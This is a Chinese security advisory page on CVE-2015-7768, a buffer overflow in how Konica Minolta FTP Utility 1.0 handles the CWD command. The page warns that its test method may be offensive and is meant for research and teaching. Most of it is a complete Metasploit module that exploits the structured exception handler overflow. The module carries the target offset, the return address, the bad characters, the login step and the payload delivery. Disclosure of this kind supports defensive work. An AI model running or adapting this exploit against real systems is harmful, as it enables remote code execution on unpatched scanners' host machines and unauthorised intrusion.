Konica Minolta FTP Utility缓冲区溢出漏洞(CVE-2015-7768)


Konica Minolta FTP Utility缓冲区溢出漏洞(CVE-2015-7768)


发布日期:2015-09-11
更新日期:2015-10-10

受影响系统:

konicaminolta FTP Utility 1.0

描述:

CVE(CAN) ID: CVE-2015-7768

KONICA MINOLTA FTP Utility是KONICA MINOLTA复印机使用的一个软件,可以把扫描的软件直接传到电脑里面。

Konica Minolta FTP Utility 1.0在解析CWD命令时,检查输入大小失败,在实现上存在缓冲区溢出漏洞,远程攻击者通过较长的CWD命令,利用此漏洞可执行任意代码。

<*来源:Shankar Damodaran
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Shankar Damodaran ()提供了如下测试方法:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
      'Description' => %q{
          This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
        leads to an SEH overflow.  Konica FTP allows anonymous access by default; valid
        credentials are typically unnecessary to exploit this vulnerability.
      },
      'Author' =>
        [
          'Shankar Damodaran', # stack buffer overflow dos p.o.c
          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'EBD', '37908' ]
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'Space' => 1500,
          'BadChars' => "\x00\x0a\x2f\x5c",
          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows 7 SP1 x86',
            {
              'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
              'Offset' => 1037
            }
          ]
        ],
      'DisclosureDate' => 'Aug 23 2015',
      'DefaultTarget' => 0))
  end

  def check
    connect
    disconnect

    if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    connect_login

    buf = rand_text(target['Offset'])
    buf << generate_seh_record(target.ret)
    buf << payload.encoded
    buf << rand_text(3000)

    print_status("Sending exploit buffer...")
    send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string

    handler
    disconnect
  end
end

建议:

厂商补丁:

konicaminolta
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.konicaminolta.com/

本文永久更新链接地址

相关内容

    暂无相关文章